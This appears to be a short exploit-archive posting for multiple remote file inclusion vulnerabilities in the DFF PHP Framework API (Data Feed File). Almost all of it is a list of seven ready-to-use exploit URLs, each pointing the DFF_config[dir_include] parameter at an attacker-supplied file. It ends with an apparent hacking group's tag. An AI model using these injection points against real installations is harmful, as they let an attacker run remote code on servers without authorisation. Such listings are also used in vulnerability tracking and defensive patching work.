DFF PHP Framework API (Data Feed File) suffers from multiple remote file inclusion vulnerabilities.
10f0ca488edec55c13d656a23eca06c8d25d5bc95c8de9431ab08dd8608343fc
# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
# Exploits :
# /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
# /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
# Tryag.cc/cc